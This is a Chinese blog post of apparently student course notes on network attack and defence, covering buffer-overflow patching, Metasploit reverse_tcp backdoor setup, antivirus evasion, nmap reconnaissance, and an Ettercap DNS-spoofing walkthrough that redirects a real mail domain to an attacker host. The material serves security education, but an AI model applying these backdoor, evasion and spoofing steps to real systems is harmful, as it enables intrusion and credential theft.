码迷,mamicode.com
首页 > 其他好文 > 详细

11111

时间:2017-06-25 23:07:42      阅读:504      评论:0      收藏:0      [点我收藏+]

标签:欺骗   策略   dnssec   run   网站   mon   ann   star   自定义   

逆向bof 按ESC键

:%!xxd         将显示模式切换为16进制模式

/e8d7         查找要修改的内容,/后面是要查找的内容

ESC+I键       可在文档中插入语句(insert)

ESC+R键      字母替换

:%!xxd -r       转换16进制为原格式

:wq            存盘退出vi

gdb调试程序

gdb 可执行文件名            进入调试

r                            run,执行程序

info r                        显示执行信息

确定溢出攻击输入值的构造方法  32bits+<getshell>函数地址

后门 –p指端口 –l 指监听  与cmd.exe绑定-e

设置payload:set payload windows/meterpreter/reverse_tcp

设置监听IP:set LHOST 192.168.20.136

设置监听端口:192.168.20.136

查看设置信息情况:show options

开始后门监听:exploit

三.免杀 特征码:类似于人的生物特征,恶意代码可能会包含一段或多端数据能代表其特征。杀软一般会对文件内容进行静态扫描,将文件内容与特征库进行匹配,来检测已知的网络攻击。

基于行为:基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。

免杀效果评价:VirusTotal、Virscan,在线监测工具。以不做免杀的后门作为最差标杆

-e编码器 -i叠代 –b不能包含的字符 –f 生成文件类型

四.恶意代码 Windows计划任务schtasks每5分钟记录一下有哪些程序在连接网络Sysmon是微软Sysinternals套件中的一个工具。可以监控几乎所有的重要操作。

动态分析:1.用SysTracer进行动态分析,对不同时态的电脑状况进行拍照,然后进行比对看看是否有可疑行为。

分析该软件在(1)启动回连,(2)安装到目标机(3)及其他任意操作时(如进程迁移或抓屏,重要是你感兴趣)。该后门软件(3)读取、添加、删除了哪些注册表项

(4)读取、添加、删除了哪些文件(5)连接了哪些外部IP,传输了什么数据(wireshark抓包分析)

五.信息搜集和漏洞扫描 DNS IP注册信息的查询

基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点

漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞

  1. Whois查询

        使用方法:whois +域名

Domain Name就是域名 ROID是注册机构ID  Domain Status是指域名状态    Registrant ID是登记者ID    Registrant是登记者  Registrant Contact Email是登记者邮箱  Sponsoring Registrar是代理商   Name Server名称服务器甲    Name Server名称服务器乙        Registration Time注册时间     Expiration Time过期时间    DNSSEC是DNS安全扩展  

2.nslookup主要用来诊断域名系统 (DNS) 基础结构的信息

使用方法:nslookup +域名IP2Location地理位置 网页在线查询地理位置,很方便

3.Netcraft查询   在线查询dns信息,可以查看web服务器操作系统版本

4.IP反域名查询   输入ip查出各种信息

5.搜索引擎搜索  Google Hacking 可以对目标组织和个人意外泄露的web信息进行挖掘。

 

网络扫描

    Nmap包含四项基本功能:

主机发现(Host Discovery)端口扫描(Port Scanning)版本侦测(Version Detection)操作系统侦测(Operating System Detection)

例子要求:获取http://nmap.org 的主机是否开启

输入命令:nmap -F -sT -v nmap.org

/*-F:扫描100个最有可能开放的端口   -v 获取扫描的信息   -sT:采用的是TCP

例子要求:查找45.33.49.119-120(45.33.49.119:nmap.org的IP地址)的主机的状态以及端口状态

输入命令:nmap -F -sT -v -n 45.33.49.119-120

六.MSF  Msfconsole常用指令

 

?   帮助菜单

back 从当前环境返回

banner   显示一个MSF banner

cd   切换目录

color   颜色转换

connect   连接一个主机

exit   退出MSF

help   帮助菜单

info   显示一个或多个模块的信息

irb   进入irb脚本模式

jobs   显示和管理作业

kill   杀死一个作业

load   加载一个插件

loadpath 在一个路径搜索并加载模块

quit   退出MSF

resource 运行存储在一个文件中的命令

route   查看一个会话的路由信息

save   保存动作

search   搜索模块名和描述

set   给一个变量赋值

setg   把一个值赋给全局变量

show   显示所给类型的模块,或所有模块

sleep   在限定的秒数内什么也不做

unload   卸载一个模块

unset   解除一个或多个变量

unsetg   解除一个或多个全局变量

use   通过名称选择一个模块

version   显示MSF和控制台库版本号

七.网络欺诈  1.Ettercap DNS欺骗

将kali网卡改为混杂模式:ifconfig eth0 promisc

对ettercap的dns文件进行编辑。输入命令vi /etc/ettercap/etter.dns,添加两条指令:

mail.10086.cn(欺骗的域名) A 192.168.163.135

*.mail.10086.cn(欺骗的域名) A 192.168.163.135

kali进入ettercap(ettercap -G),点击sniff选项卡的unified sniffing选项

蹦出个窗口,点击ok

查看存活主机列表,看到我的windows主机IP并将其加入目标1,将网关IP加入目标2

选择dns_spoof插件

选择start sniffing

在windows浏览器地址栏输入:mail.10086.cn(欺骗的域名) 成功跳转我们的克隆网站

两者结合成功。

 

八.Web基础无

九.Web安全

 

SQL注入

原理:做填空题

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

 

预防方法

1.永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和

双"-"进行转换等。

2.永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。

3.永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。

4.不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。

5.应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装

CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性

 

PDR  P:执行安全防护策略(防火墙 vpn 访问控制 身份认证)D:实时监测(漏洞评估 入侵检测)R:实时响应(应急响应,备份恢复,灾难恢复)

渗透测试7个阶段:1.前期相互交接2.情报收集阶段3.威胁建模阶段4.漏洞分析阶段5.渗透攻击阶段6.后渗透攻击阶段7.报告阶段

安全漏洞生命周期:1.安全漏洞研究与挖掘(安全漏洞发现)2.Exploit代码开发与测试(Exploit代码出现)3.安全漏洞/Exploit代码限于封闭团队(安全漏洞揭露公布)4.安全漏洞/代码开始扩散5.攻击工具恶意程序出现并传播 2-5 0day  patch发布6. Exploit攻击工具 恶意程序大规模传播危害网络(patch修补检测移除机制广泛应用)7. Exploit 攻击工具 恶意程序逐渐消亡   CVE安全漏洞命名索引 NVD安全漏洞管理信息库

模块1.辅助模块(信息收集环节)2.渗透攻击模块3.后渗透攻击模块4.攻击载荷模块(促使植入代码,打开回话链接)5.空指令模块(无关操作空操作提高性能)6.编码器模块(不出现坏字符,对载荷进行免杀处理) Metasploit攻击载荷模块分为 独立 传输器 传输体

 

内存攻防对抗博弈图

基础的缓冲区溢出---GS cookie----SHE利用----SafeSEH----P/P/R---SEHOP----伪造SHE链表----ASLR----堆喷射----DEP----ROP----DEP+ASLR----JIT Spray

DEP数据执行保护(操作系统通过设置内存页的属性,指明数据所在的内存页不可执行)

ASLR地址空间布局随机化(不用固定的基地址加载进程相关的的库文件,栈、堆地址随机化)提高诱导能力:1.表现自然2.学习知识3.不要贪心

问答的种类:1.开放式问答2.封闭式问答3.诱导性问答4.假设性问答

免杀是通过加壳加密让原来能够被杀毒软件检测出来的恶意代码逃脱杀毒软件的查杀。

为什么引进后渗透攻击模块  Shell、Meterpreter攻击荷载功能有限,用户要实现特殊或定制功能,可以通过Meterpreter的扩展脚本写,但没有统一规范,不便管理。

MAC OS X本地管理 WINDOWS 口令摄取 本地侦察 无线网络

基本指令  background 将Meterpreter隐藏在后台   sessions 查看成功获取的会话 如要继续和某会画交谈 sessions-I      quit 直接关闭Meterpreter     shell获取系统的控制台

irb  Meterpreter与ruby终端交换       添加 railgun可以和windows API换

 

 

 

 

11111

标签:欺骗   策略   dnssec   run   网站   mon   ann   star   自定义   

原文地址:http://www.cnblogs.com/zym0728/p/7078361.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!